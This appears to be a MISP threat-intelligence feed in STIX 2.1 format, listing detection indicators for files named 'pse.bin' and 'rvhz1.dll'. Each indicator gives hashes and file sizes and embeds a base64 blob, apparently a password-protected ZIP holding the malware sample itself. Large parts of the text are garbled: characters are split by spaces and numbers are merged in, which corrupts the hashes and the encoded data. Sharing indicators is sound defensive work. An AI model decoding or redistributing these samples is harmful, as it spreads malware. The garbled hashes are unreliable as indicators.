'UEsDBBQACQAIAA6h71BRtskHiu4CAABQAwAgABwAOTJjYzhiMjJhODljYzU2MDk2MzQwN2I0ODI0NDNiNzZVVAkAAzxiD188Yg9fdXgLAAEEIQAAAAQhAAAA0zIKgFQ8wzHj/YR1PvlHLFBiZwgzy9w9SYK0fADtkG5jbfiwPN03BJmf2NcHhR0gLYxaOkwdFw17sZkHIUNArOA3B8KCVc7unl0/4JBjYIqt+PgPXGd2pe5t1teSmcksxfyqTLr1lIRqS/4lyitqAPUPh7ruq/aNjpwG66cOxIT+Mzotf0PcxE+xSzanud7z3PSqrsBJ4Enaucq3nGCCtxc0zmnmwBczmLj2ieDnb+re+F+5d0bjTtf6JiH+yl5wBlrSMhcOW2obrSF6zsMLgLJrjYFbOHb7J73daay6Dza8JAlm0BliOpo9toZ9LKTZhPpfHZ3QvvlZV/brhrm7BSQ5rOkBKuNVnIdYc6UL3vIMTYVjZ6Pt/rijDZQ6dVnsBPgkyBGKmobjgL0
S h V k O H / p J t G S q B m A 3 k L + 403 Z j x 5 z 7 a K 6 d 6 c d y h X G z o Q O H f D h s T C H B S w 2 H Z i 1 W X a / 2 M 0 8 w E k v E 3 Y 5 i p 5 O P k v H z l u d T Q e n 4 E a 2 a a k i O c B j t k z 4 g T Q b 69 + y M s f + S N U 44 E w X O s S / b R z Q o f G / r O K E m i Q u t M c Q o V s g E e N 9 P U Q r c X U B 3 w N s d z l 9 G q v N l C B j G P w R 47 h / F L s l v v 0 T G r + Y w w A 3 P z x S s 2 c H e + 7 s F M 3 K v a 0 d V 0 31 T H w 75 Z f G 5 M F m 9 E r d w D G L k Y c 34 B V A I L 7 x 6 t g 4 g 0 W C p Q F d c Y u C T 8 u m e P 5 R F P + b L z 28 A A Q K Z a J L k m l d P o Q u 1 O 9 K + I c Z k N + X T W I 0 7 v O s o Q u H 7 + l G z P c 7 e X f n x 1 Z J Q G i T C c P a y K F C 5 k 5 q B 4 N q R J r n E j u B Q S A V L O 11 z B V 9E7 i T 7 w j o p 55 E X f o s 9 S k J 1 Y J x S j M n x f U j E A W v 1 v A 2 / + 3 b L F h P i S b Z C E 8 e Y c X 0 t D + u W 8 A k N F T p X i e Y f K u 6 W l 742 S i M Y H 6 m 2 P 2 D s I y F r D o a n C 4 C w h B v S + B j z 86 r i o / X l 0 y 8 R b J 0 e q p F i Z N 2 B j N / h y v B R p a D O y p 84 S t y d X / t e T y e H 4 m D Z P y v Y 82 G A B s z 7 o W 2 O k G 8 y H j h j 8 C o e j q L R y F 0 q N 5 F r + C w v N u K T t f 5 G K L e m + A r w Z o R A H l p 38 T M Z n T z c g U d E Y C W 4 A 5 c p J E C / E d j d e + P 6 M G v 9 + m H w K C g X 7 z g R c g L D 1 s b G o L r W o e 9 d f 5 F K Z n e 9 / 31 O R p / M s k e t Y Q f e 9 w X h W A / y 3 S M S Y H V z 4 + S j r q F 74 H y W x D X u j p P r 73 s N O W 9 r Z q 4 N t O k u l N Z 0 h N C y u v b j Q j g b X B l Z W 1 U i 58 y 5 o B D s g 2 D w J H 3 h 3 y B L f k t p i s + l y M J F 2 G Y j v Q y W l / A Z C S y 7 o w c L O 8 J O 8 g e E j 9 J 2 y 1 C y F o T o X b O W p v j P V h n 7 g 6 N C P 1 D Q M t l F 0 / t q 8 h l L r P D 25 s U + 2 L 9 Z s l 3 Z 0 Q M s 4 l i F c M a / P S q 6 d E S B U g 71 p x u M S x u m E I L 4 N 8 V c B v 3 D E G i 9 c c z 6 R G a j w F Y M u C 12 P 7 X j 8 r z 7 F W W o I v H j H c i E 6 E I t d K u d p D 5 D 
692 j c p Z X R 9 z e s b w x H t W / 4 I 98 o h q O p 9 K F 69 j j 1 Z b V 1 B P K F m y N 6 T P i p U x X H L e u 9 I F 4 U 8 o W 6 K i Y f / Q H e J d I 0 O w t m O D g V 4 y v o 7 f 9 w e R 4 N 3 q D i i Z y G / H 0 + b m H F D h X v X O Z v y T g t A p m a J + E W 0 R N L D v E z k b O M P c w Q Y 5 I 6 w N d E P G u j V o j 6 m Y 9 / I G J p J o O o 0 y D 2 i a 6 w n u + q V 6 g h Q o T c i / p Z v 3 T W g G E q G S n 8 L C 3 j N y U u J c a 4 / 5 J o x L y K I S 5737 j S R q o k v 9 r J n W Z A W 6 D h b f K l s y x o m H 5 y a f u S k 8 m b D r X I / v u K M / k I k X 2 C V m J D s S J J L H H q X S k 9 U j h I y D 2 + T m Q S K 4 Y Z e h U U J + R Y r 9 r B c 3 o m K o b J + Z y k 1 x j g 205 o I h r r + l G L I o 9 t V J Q r C Y o l V n j P v o G A u 9 k Z E u 8 f O a 3 Z q e r w B E 8 i W m I i i / X g h 7 n A 37 I f n 7 w g s L 86 P L y z 7 V V L 6 G 2 N b b 7 X 1 W T k X Y Z 3 c m T O 6 C a Z k r x R i T D H J c 7 K 8 t a p E Q z + A q m O a 5 Z 72 / n 1 z N S 7 C r z h + L 2 X Q T J 3 M e a y q a J Y u r 2 I R c v P Y I g h x U J 2 x 4 O V I R 8 s K X O r C J 9 G b P K 18 M S h 2 t p D z Y C j b R f u 3 L L Z Y Y C R Z 6 k / + j W L n Q e c C H r a U z I J Q e R w p w h V f o c D v Q x Q n J l 2 T 3 m Y q O c C P s P U C D A h M r J V 6 l A p I S m 0 v f V j l B m c u o l I Q L T x y U T G z K y / T B Q T 9 j 0 V N a x c P c 2 b f 7 / C 1 Q t 7 F X w R d c 6 F H 8 O G D i O l O 1 C T a b I N 7 G u K K c 27 D + w W L C Y n I r I v D a 6 O S 7 X 8 f z g Y n + q C M j 4 l Q M A D T D / p C 6 s L d C h + 5 i P B g d a D X p C Z j c d R r 93 I o h Z h j W m t O c u O g s o 6 b S 7 Z 5 f + h M x U M t V H q e a Z I D 0 K J l P u u 39 B B M 5 d q 9 e y M V a X H j V P + h V 3 S u g D 0 + x 2 P m V A L x 32 R 9 N 0 u 80 f E z v 39 V V 7 R 2 j / 3 e V m 1 R b f b u v 7 N S 57 d y k 0 9 P i J s l 0 + T w 7 k a L F I X k z V 9 V 1 H e F H L P V y P o R 7 j I P l y D 1 W T f i X 8678 b P b F O x 44 s B L w b T R 1 o h x i i Q 4 s N h j E W a N y i 6 Z R z E f S t 
5 c a p s N L h A Z k o K L Q O E N Z L l x U 8 V S S o i m b v d M 6 C b b 3 g z b F 1 p l 7 L e A 4 x / q R B n X 73 Q N C d k f J C g p T j 6 F + Q m Q + h H v O e 8 k q + 1 z 0 K 9 C k y / t E P 3 Q m v X K F e + o h i Z F 3 w s u P 7 U H t G K v l 57 c Z r C l w S F f 5 t n B J Z 7 Y 1 U b L u P 39 h C Y v C t U h a 8 + I s U u 0 G E C t S m L d m R f 26 v 5 F 9 A m L x J z X y M h T e m 9 R M / x V b 4 K T R N 0 e n 7 X + k d i E U U g 9 T 2 m z z S Q J u B m M 2 r o v / Z 65 z m O f 2 k X Y O t l M q 7 E M S 6 R O Y e d M B 2 R N o B o / A W e j p f I k k g U a i E O Y Q r k p k k u 4 k M c / O Y k v / T L 0 O Y l L S k i F R + q q x q s I m a z Z 6 k W p 3 g i w G F 3 o t p w t J + g Z c q V w q n D j q K q L h D w c m C R g k h C w q 59 y c I l J r Z o j R W q Z P a Q r v 5 M g 6 b n U f F u j L r 0 F q r j n T N v i r H s r e W M H R u M G n 2 B 7 i T w q 3 + h Z H p Z 2 l o 9 Q e f S L 79 S 9 o 8 f 7 u S Q G i c f B 3 S I T x 5 j A v c I r a o 6 Z e 6 K P y a k s V O H N 4 b l j s B 70 U T K o q + c D E u b H 9 X T Q L v + 2 u w 6 T e b y T 3 e T H H g T j D x a h H D L R o q M 4 f v E K D v t S c R 3 e J 7 L R x 4 n q 0 / s y + + W t i Z 7 Z K M 113 q E W K p i V P C e 7 Z z Y p T O f S x J w E Z 8 c f y G 6 f S a 5 k V b a z n n p f S 9 m X K L m H g f l x V u Q K T r 8 t a Q e n T D Z + g L 1 j V Q v k c Y z 90 f y W Y I i 2 W H W Q 6 F b d 1 l J X m h 2 + 8 h b 55 C D W n w W 6 W h D q O 7 X 3 C T K k G 71 v 9 X / X D L T u i Z a H U 74 q z 4 F R J M 9 G l v v A F f U 7 L J 2 g b N G T z 2 j l 8 V m 7 D C a G P N s B M j p p U j r O S Z n g k l h s l M N D 7 u X q w / D 5 q d 8 T 5 f u R z C j x 0 Z R 2 Z 308 r l 5 n 9 I J e 0 D o V G A v J 8 l d r P o 5664 d I L W g q H O b L t L d F 6e5 L p h P x k Y P K d n 2 w F 1 X O T W G l F L H r + y B M 8 e n S K m R V x 6 G U y p M h j f 26 S U 3 x z V P z M i Q E U l d l E v U M t y 9 i +
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2020-07-15T20:09:07Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "file"
}
] ,
"labels" : [
"misp:name=\"file\"" ,
"misp:meta-category=\"file\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--46037d3e-727a-4508-8dcb-d10de58a764f" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-07-19T19:06:06.000Z" ,
"modified" : "2020-07-19T19:06:06.000Z" ,
"pattern" : "[file:hashes.MD5 = 'dfb1fd17182503b2f15fbf6c5c30ff71' AND file:hashes.SHA1 = '4bc94298f3b7a33768718ea309f9223d3aef3250' AND file:hashes.SHA256 = '1e4cdfc57086203dce60611c3a7397399199962dc4bd4fa984b0ff0a27f8c3a9' AND file:hashes.SHA512 = '58a340497a5d8c5f2531ba67c6e2eef63768cd7cfff5cd72bbc23104f3e98ceb676e0ce369b7310f43a42aba08884bee26797cf79f1d56d38d11922f6d18ab05' AND file:hashes.SSDEEP = '384:xkHY4guhZuogdd+KEiCZfl/yGFj0KdHf4gphQTDHzJ8k6X5ihHfzwyU/9tRKhD27:f4JhymiCz/7mk3QHHaXIhLJUpKMsm' AND file:name = 'pse.bin' AND file:size = '280078' AND (file:content_ref.payload_bin = 'UEsDBBQACQAIAK2Y81DZEg0HgUcAAA5GBAAgABwAZGZiMWZkMTcxODI1MDNiMmYxNWZiZjZjNWMzMGZmNzFVVAkAA3WZFF91mRRfdXgLAAEEIQAAAAQhAAAAHEPCvGq0eQqij9XnAYUDB+Q2xbWnXJ/pNWvMWoYPh/0QJfldDPOxivgGWDfYq8JS0FTbxyQ8ZmmzECNFmNg3YFOlA4yFKSN7g6fj0fDXwBqwdD9UFNMmJIVPlAQ/zSS95pLZuBnuO2c7wk8T6ZDnpoWkS7Ib4BFM4e3vjPszTRCcialeDcshcm2T5taJWPzOPpdYnvkjGrT3fDGv5Nprr+tpZVqvZTMQDErTUvlx/YoBHgaXWuQ1C5Lb2XOn2R60IuvURLTWWtVa4ao+ONuaNh38KH1cbFNF4mZK1dO4oiiCnWk3WePMJpL8P1yDHo8iPqShtauBzff9NBx8+tgMaMY7D+JEveZbVzQnqO5kUthXJv0oTmQc9wDQCwR6TYKe
Q I j W J W t 76 D V I m 4 K A d y h n 18 J M z 9 c B 1 c 94 E T h Z z W s K Q o v q c L 3 s i 1 Q O L + n j 95 a k D p u A 2 q M 3 + 9 a Z X U e C + 9 g T B 2 a D / P T O / U 8 v S 0 c E s g y p h Y 1 n f s C 0 3 u 9 e k y 93 G 6 O 2 M k s k p q U y C T p F g E 3 G l T F P V 88 j I k w + T 34 f e U y i j X 9 b L G / M u 4 M i 9 Y m Y c f D G O W j E F Q w s J i X K Y r M N Y h t 5 / + G W L y 0 O m C t O i i v 5 X 5 X T L c 8 f B P E R o l l i C 2 U / 9 k L P d S x R k U b u k + I 2 h F M i o F v E k U D e y W z N Q q O G 8 G a d F c a + S N t i f Q u Y i s L 2 G q c v G W L t W H 0 1 j N m T f Q H M J Y H g / G b a m u m m 8 q q c g n V V a 0 D T W B y o D q 9 z q U G E h U u r n a w y a h k 0 5 M U c x M V b G 9 I U K L + v X o Z g W X y k B 5 L g w L 1 U G 3 / e O y g t E c H n 1 h i K R u B M y u Z q f Y Q 5 l A N Y L X f E R 5 L h B 4 N v R G 0 4 O B B F 0 s V i I C B H H h 2 D W 84 z R / K j g F n C 0 B 6 d R J + P E M H S a w 7 + d q a 5 L N A h 7 y m T 7 P s B e y C G G m Y C V b j 2 m 1 a o K c L w x s Q I q H G I F 2 W T H 75 / T h u B k P i B j K c e O I j 1 n L H 5 D I v D L k g B Y 1 a 2 U I 76 M B y o h C g S N T 1 R + e 6 T 7 r 2 j / T B w S s h u q k j g v K 3 Y a Q q y A M T j X K u l C q 0 Q p k y L N z 62 D V i a 29 D q P Z 6 x g O E 53 X s r Z J 4 H d T 2 K O B 1 l o X / h M 3 z F 4 e Z 7 D 6 P 581 r q r c w k r r O f A H Q 2 I Y 0 / g 487 J V U I 560 n + i 5 n W r n O m 8 D 51 n Z T M + Z x J y 7 f V l p U U L B w q r k L Y s 2 C K V v K y R C F Q v 74 R 0 q w x w l x G j 7 Q J 62 a w r 6 E M t B L U i O 9 I q V J K 9 H 5 L Z A r H O x O Z A S S 2 i W O W Q H a i m A z f 5 o M 32 C 0 J 6 s 7 C g 8 e E E Q P 3 N L y R I G k 9 P u y k A r M I 2 R U K w + e 1 G z S 4 H d h 7 c I w 2 t x C a q M t c 0 Z G x 9 l T T G 5 y 0 e e i Y A C d G 7 S s d y V C w x 82 + u 5 o 6 Y K K y + W z / T D K a R 0 S K 5 a P o l B 3 x U / O l Y R I S m L 5 b 8 h w v f t Z Z U n G v F R D i k l l + e F C n h L K A Q A q L n T i H T c E A M V K g 2 V 6 A z 0 8 Y F I T 
F M Y c X P 4 Y n h r j 6 k 9 f i g 38 F f h p L Y A Z 3 w + w D 7 i Q m M l v a Y t y w + g e q x Z O S m 4 R 4 T r 7 X P w U Y + V 7 j m Z b F H y J 6 + / D D l d U j k s Y p n c M C l Q H d T p J A Q o 8 b H Q x y A 8 Q 9 x B 1 H o 7 F C A 2 C b Z v 3 u i 2 l J y q A S f g v 0 T y 7 V 6 T u o p m E 0 0 x k P 32 p z z n Q d 5 B 6 e G m 8 u D + X F G L v w C c X Y R S Y g q A 9 c x m K L Z T f t 3 V 47 W b L e Y v d D x p X A E B A s 1 X T / X x n S 1 l 8 f M B 4 x Z 0 W e t c w j s / H S e e P x M 2 H 1 v r v G K v 1 T X T Q w v 2 G H 3 x t y i t G m o v 0 k T Z i C U h n 5 N m N 4 J T 5 l f y M V g e v x S Q k m L R F 3 / F k j V d W u h e q + j 885 R 9 i j A o k 34 d G m 74 u 4 s R y z W y p Z S X W f z N Q L m e 8 Q X H 5 w C V K Z + F k C W 7 r E G A R s z z 7 I 447 B f + g v 7 C w M w 2 j k t 7 p X R u O u a I n x 76 X K H c R L 57 K a v v 5 R w b q Q Q E f e 0 J i w Q J n H s x j V 7 K d p 6 p I a e f T t u Z V M e i p A d b f 8 c U A h y x Y R z F i n g k k r r 1 X N N S j c P Y Z p a r 0 y N a 0 S q a u 0 N n L q H H t M g n 5 e B Z C f O s 2 n K d f M L / b G 9 y H 1 R B S 1 t g W J 0e6 b P 1 L R s K T t 95 o M 8 W O P d g M k o c R 8 Z 44 Z l J 66 L K 44 h f U X 5 A Q N B G 2 T r k r Z Y T 4 k 91 t Z h t b s Y l h P J + 72 M b 7 R X Q j Y 845 r t w C k l A P o o r F r B 0 W C b A m Y L 15 i K O 3 P X r N A 0 M b M l 90 H q E p L K C X p v D w q Y Z z H F T G v H k t E w H F z A S 3 w G h B T b E D O J s m b Z t 5 F 9 k Q g j o 1 l 7 Q 2 P e i C d 5 P l s 4 m p I B r 6 d L t 6 n y N X T R i q I N X n H T J v a a Y q A w 1 / p / v i W 4 t V d I i K y d L 51 u k Y W I z m z V C T U T m 0 2 c E i m e Y h Z E v / 8 A H 4 v D A 3 D N G 9 V R H J 5 W M n 7 w s 2 R T f + + K T J x X u L r T h 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
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2020-07-19T19:06:06Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "file"
}
] ,
"labels" : [
"misp:name=\"file\"" ,
"misp:meta-category=\"file\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--612fb261-eeee-4173-a89d-074aad7c64d2" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-07-19T23:55:16.000Z" ,
"modified" : "2020-07-19T23:55:16.000Z" ,
"pattern" : " [ f i l e : h a s h e s . M D 5 = ' d b 91 c 4531 a a 46 c e 160 a 71 b 9 c 74 c 800 b b ' A N D f i l e : h a s h e s . S H A 1 = ' c f 45535 c 5 d 392 b f d 58 f b 385 e d b 46798 d 64793 d 98 ' A N D f i l e : h a s h e s . S H A 256 = ' 0 76547 c 290 c 80627993690 a 9e6 c 15 e e b 2 a c 9 b 86 a 9 a 33 a f 2 d 3 d b a a b 135 f 1 f 43 a b ' A N D f i l e : n a m e = ' r v h z 1 . d l l ' A N D f i l e : s i z e = ' 376832 ' A N D ( f i l e : c o n t e n t _ r e f . p a y l o a d _ b i n = ' U E s D B B Q A C Q A I A O i + 81 C c o B 6 C c r 4 D A A D A B Q A g A B w A Z G I 5 M W M 0 N T M x Y W E 0 N m N l M T Y w Y T c x Y j l j N z R j O D A w Y m J V V A k A A 2 T d F F 9 k 3 R R f d X g L A A E E I Q A A A A Q h A A A A f z 3 c w D M q 62 K q s 79 C 1 M x r A K z 1 h B V c Z f 6 j 9 q T Q t f v V P h Q m 3 C Q 54501 J e 2 X 6 + T R e Y B W + S c W I G y c A R 2 B a 40 l m 93 o 9 T W h z d T h q x e f + R 2 Q u f / N 1 K o T I V G P R b t u i g y Y p l S Y z G O z a W q G O s M N N p R I H H 0 K U + X 91 z 9 D b 1 v p c 2 x Y + r a M r m f T N H U W + Q a c c G L D + 3 y o 8 U g K v E L e F O K q Z s E q 4 A N V x s 40 O L c f q K R S M t s j v U R 3 q y U O z B t i X e y C b f 4 i C P M 9 W X S E O R 9 v + X D n 9 Q a 7 + q W D t h f J d X 45 R V Y B U c Y n H I 4 e s T V 8 v t D 7 F v K i n p + m F A I 39 j 5 H a Z U 3 M G 6 L v m o I u L j x R Y w F d v W 4 C N m c O Y F j Q l 3 O Q j V W g 7 s O k 0 n 3 x u o v 8 C G f 29 V t 52 U X K t Z J m r 4 z v 2 n Q b D U / y 2 U e 0 X z q T q k C B a l d 3 x y 4 x Y g C b Y c 26 g l 3 u / 4 T + Z k 5 l N e R 8 F l c 3 H I 49 u Z X j L G N f h r 4 g Y k E B w f S R H a j L m B w H 4 e b 68 K v 5 R k Z L 9 s X b 9 y y G / z b y l E 1 S 3 i 7 y d A v e X x d H K B 1 T C C p I 7 U C r z o k K H p 0 s 8 P b 1 f M L s g r M Q 5 J E A 79 O C 9 d c e r 3 O z N f 0 X + m i S 32 x 7 d Q z l g S u C O 9 R 8 b Z R f n u C z U U R 0 Y L 4 s S w k Z 1 q d 53 w Q x Q R K B s 5 G 0 5 S E j 9 n e C 4 g t Z i F o B 
L Z H v S j 143 f K q Y j / 1 t R A d n i n C j p g b g 6 K 5 K v g p H 8 I 8 F w c Q p a B y B n 9 B J f b z c e V i H 3 n S W M t V D 1 U A W c e f 5 r y n C q o A a q n k F r C 7 b R 6 U 40 H U Y v h 8 r I 0 X T 5 Q 2 J y X l F H Z 9 X o l g f L P I R e A q f 8 D x d 8 K T a D C t q + H G h X x S P i K a 2 h E F M N 1 I p F r 1 d Y O 2 y J b V H o Z w A m I R 3 k r p P S p R 3 d + z D a D 69 a 7 p 477 q c J 7 y f d j B T / 0 X V r g G S W a / x A u o m O 57 X q l j V W L j 0 36 a 71 i 4 F y 38 O n 3 A w Z f n 2 R 2 l E M D 2 K n V l N D s o B G f m 2 u s 5 W v L j 5 b x w X 4 I I 61 t h t O E K + N G Y 3 j / x X O 4 H 3 H j 2 C m + W l 2 k z o e G n y a S + l b O 2 p X B H l Q 5 i 3 w Y h 2 r F + 7 / 4 W l M S b Z p k V c p P 2 r y D s r Q k / p 3 n 73 a V B D R K j + i y I f i S X Z H G I s X s q y T i 2E4 C G K N 2 r r n l t Z j t C S d H p 3 i Y h w I B 70 C z + 1 G O b m d P w A P Q Z 3 / t 1 w H x g w 4 c s b O y 46 G M C g A L k / c 0 8 W c r f k 3 H O m J C g d E C c n l f s U r Z Z D f o N 49 X E W 8 p w A A d 9 V q g k m 7 k Y l S f + H W p A 8 k x 7 e J y D x A g p i t 9 R f O 5 Z A N Z g S b g I m + 0 2 U Q w u 8 A 7 K s M j T z t j R / u + z V U 938 x R v C v v 9 v E h s u a u S Q 4 P P D 5 i U d N R y 4 d H b Y R U 6 O M L V 6 l O 3 a e r 9 r x 5 r J x q H H Q y d s U d R L d b t N B D + / B T J 2 O 2 o e g G / b G N f R V w v g l X Y E B t w z z q u d 97 R n y F k z H X Y W 2 h e r z 403 x 6 s A N n c U 5 O f S K 2 u F v a F U s a Z A i 8 I 6 a p m e 54 Y m 2 h L i x h w E 80 C c 9 m G L h q n + r p 1 D O s e / P w D H y h J o 21 j i 744 M Z 2 r K F j t B V 47 + M w p w f N i j T E c r j k P S h v / R u 6 k Z + Q k x l Y M 8 m C p q t v + 6 b d 8 o u H Z m J S H f a A 3 Z A L k d S k Z d b v Z L d C j I o w O 4 o P 0 u y m 8 j o q 6 W 5 t q p C U Z W k F N 5 q A Y E p j Z t / E h w U b N M 3 N f Z Q V h d 1 R O Z 0 / u n h h J k v W Q 2 h D d a z w P f + R p Z 6 P K 9 / q K k W G 1 m 4 h t 8 v E H h Y G l K y W V b r x A + B H o a Z m Y p i A h t T 
h W O F L 5 O n v g o 0 S 98 M X z / k Q R c y Z j s G W 6 n 8 + t e 8 C D 4 D z 8 T y w n / S g p i x X P L 5 i p q x p i r U Y i b X x 7 o 7 o B V x q b c P 8 d E C 70 + J 3 i q G Y 1 n W 7 D V k M o / e L N L u M R 1 p Q U w H D H 9 N v x 0 29 + s F w C / d S p z + e s T c G T M W T j H g I 9 P I D I O Q i 4 R 0 3 C h 6 e K I c 8 x o a 1 S h F g 3 I 0 9 T d b q H F u Q e c 1 / D k r 8 y M H 7 T l 3 P O U k c r T X v Q K g q t M U b f x l Y s H A H Q D n L c e i V e V s S q X l D g M D 5 o U v L C i x 3 w u X 7 H S 8 p / e p V L r k G x X E u Z a S r L d 47 B 8 V D i B T R s s D l E n v T V 2 D G h F l o D e 2 / U k h W 6 R B l f M Q x r y K j k h i N N T x 5 y D n q O H 9 X s D 3980 k c X 761 M z O U U S b 3 e i D 2 q g 8 g E u + i U x T H b 3 z k J 0 Y U M J N L 6 f R V q X r 1 Z z T 6 f i k V 7 J v u K V C Y H t z a W x 5 U E J Z P p J 8 o 3 k V t Q G c V f S r + k R 4 i N w A A V S L C s v l O Y n 7 K 2 r 82 V w y d B C A X 0 F i 0 d F / H u W j n K 5 b i + + G i W u a / u T Z t t t r j f / z / m / Q D l + H 7 P N y E Z g q W S 1 u 8e5 T z 2 T n I 7 h F i P H A I m u z z 8 r 3 Z Y n j 8 R k k 1 A 1 b c o W 0 K q 8 B s Q y V s 3 w d R L 9 d y / e 8 g k e X 76 g r g y 5 P E x J 5 O O w 8 n X W q / k y H j Z e u L S l 5 Z U 1 K o J x N v Z P x p k R W C F V r T Y g L G i p d j j e u F T N 8 f b a / 8 L 6 d b H 6 W g g D K t O 6 K i N O b + u / u V 8 H E d o V H Y 4 D / A f x t Q W 1 W v + g j f + d w O H u S q q G o I p d 7 d o Q O / U / 7 J 2 S U C v s K O h O 9 H b S P E l a z j W 2 p j 0 C N w a x T O 9 y J + 2 j p C T u G h T 9 k X c C W q m O q A A W X / Y w G i + e l 0 s G k A V s r 2 d X m v Z p L y B u n O W 9 p F T + N + f M Z k o 71 D b U m P o D v B T d h 13 f m 2 K c x v A C u c W p / Z 50 b A Z h g d u u O 7 z S H r 55 f k R 9 k n E n 78 y y c E s d k H G W 4 y M d I B x A k 3 Q 6 k g 7 R a 1 G y 2 l m h m S V 9 j P L X X 3 C V W L E f t J 1 e K o y S 4 H w X C F M q K 43 S s w B O W N F z 1 a H B j b T 9 + X L e 1 p x l I N L W F y h w a 8 U b Q N 
c + H m 8 P T h j I h S U s k l 203 o I s f z F N / a S 2 E V e H l / 36 K g k Y G d 1 f 6 a 0 I 0 5 r q K x X f C + r C d u h 1 B 8 j e + O q I l z T C x H n l j h K h a a n v K j O r j K n k 3 E v F x O 5 O 6 g V 0 P X K Z u f G F a t w H r m z K I X U + 2 h P Q u + W F a j N c A t J y a m X 11 m e F x N g Z v d c C X y 5 e u q 56 y y k A W U S R s p D w Q Y 1 I l M a 3 A S 9 q F D 7 + + Z o n D 9 T l s c l T D s r V f 8 H K 6 y R 4 F p c o a c h 3 E T B Y p F E P b q M G Q E x b + j h j V a k I j l W h Y F o b v H J d u 7 U L E k 2 Z w N 6 S W 6 p 7 Z u o N g Y 7 e h B E z W 5 O p Z S v n 6 m 2 b w q / Q 1 D z N A T 9 O 2 R r O r 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
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2020-07-19T23:55:16Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "file"
}
] ,
"labels" : [
"misp:name=\"file\"" ,
"misp:meta-category=\"file\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--513494bf-37dd-4704-a5ea-15155c29c4fc" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-07-20T00:00:57.000Z" ,
"modified" : "2020-07-20T00:00:57.000Z" ,
"pattern" : " [ f i l e : h a s h e s . M D 5 = ' d b 91 c 4531 a a 46 c e 160 a 71 b 9 c 74 c 800 b b ' A N D f i l e : h a s h e s . S H A 1 = ' c f 45535 c 5 d 392 b f d 58 f b 385 e d b 46798 d 64793 d 98 ' A N D f i l e : h a s h e s . S H A 256 = ' 0 76547 c 290 c 80627993690 a 9e6 c 15 e e b 2 a c 9 b 86 a 9 a 33 a f 2 d 3 d b a a b 135 f 1 f 43 a b ' A N D f i l e : h a s h e s . S H A 512 = ' e f 843483 c 3 f 0 97617850 b 88146 d e 88e5758841 a 6442 d 8097483 a 0 82717 a e e f 48 c 4 b a 0 2 f 7320671378 e f d 28 a f d 1 c 1245e0207140 b e 3 c 255e7470925 d 86e3 b 1 b d 8 ' A N D f i l e : h a s h e s . S S D E E P = ' 6144 : k r M Z //+TcHKiFX1F5UsCj+2s4wsMAAJb7WjMAuk5XalWUdc2Cb:Dt+TcVFF5TUU4wtb7WgAr545e' AND file:name = 'rvhz1.dll' AND file:size = '376832' AND (file:content_ref.payload_bin = 'UEsDBBQACQAIAEIA9FCcoB6Ccr4DAADABQAgABwAZGI5MWM0NTMxYWE0NmNlMTYwYTcxYjljNzRjODAwYmJVVAkAA/veFF/73hRfdXgLAAEEIQAAAAQhAAAAW2CEUMdzUB4NDcIM1gPGqxAbyD3JRWImp7VjoRtpGOpftDXJNZy0jFmr6iKxdZFvx8euAvSJHq26y5kHykXXSoB7SXoV/2LsQIX853Op9MbvJ/sllAr0WyhTOXDVduPpZIIJYo7QrV35RX8fQ8ZZ7el9Z2PcofGJyl729aRX/vaVPeIsy3Dj7hfEmKpLbn0DOMatTG3T35+lOwypzwTVNoNTRuqNUgAQGkM/JO/9sHVNmPDU9dCiACZmEnXbI4DYgZvfRxaSrgJnzA+/sX5akjFemYOpjkV5/ITERkjAt1xhSYrDapVkmz1pzgzp61mr9beZzXkhAyMcTntm0yTUlNOP8YMFT0WEaQgzXHnqBwYBp7HhmUldCcafh1cubvuSflVfJ6bTH98vvXW4jpjlpWJgOxUbsFkweHFRKETP42/Z8AnUBn7SP0gstXFapUZ6S0kW4BSFAR596lz8fMAXFnf9tuahT+JMn46rH/q9tIZbsfiRqJ8hqgZEtXpX0APrIF2CCfyN9EOG9P30/dB1AyPyjIXJ2BCawXLOJXS0oia4lf/QdUUKItw5bQNFxH3ma8zNsznlHd+en9gPQMrF3BC39M0HSeSQdgZ0+hXFAg/5e85qKknRrpQeY8DaYalEMqugv6NfdEqP6h17IAn1v7ln0Zw5Ue//Tc0wSUPilpKzrw2h6RWkFzVRoY0OlD/ScWueMnsbjbDf+CYWCWxKYXngZ0uMn8lLnqrWYPzYUkjRNIy2d8s87WsLPEINmC6lQKsVIJdxJQHDOQN+d8tWVX9h55ytOaTwJbyUDNpfLQfi044Lf7yTV/9ouaywXYKylmxaTT511fa9YCyMyVlaCopqZ9XT/LDyR3BiVqEFkvpgq8PbuH8qM6KR3jgrILCtu5tJZIcQaPnQSGJYkaYRXlZd8TEnBNNOUFm+N1kg+WaJ5H30kRywyVYNkAr1LW1x8r2YdEN20hXXVR89hLm53z3Ds712oRDjZsrZC5AvKsNVxUceit3L7fK/DkwHdvope0e3Zs5tpH8aepXdftta4hDVRn8XeGq+vc1TcnF2y
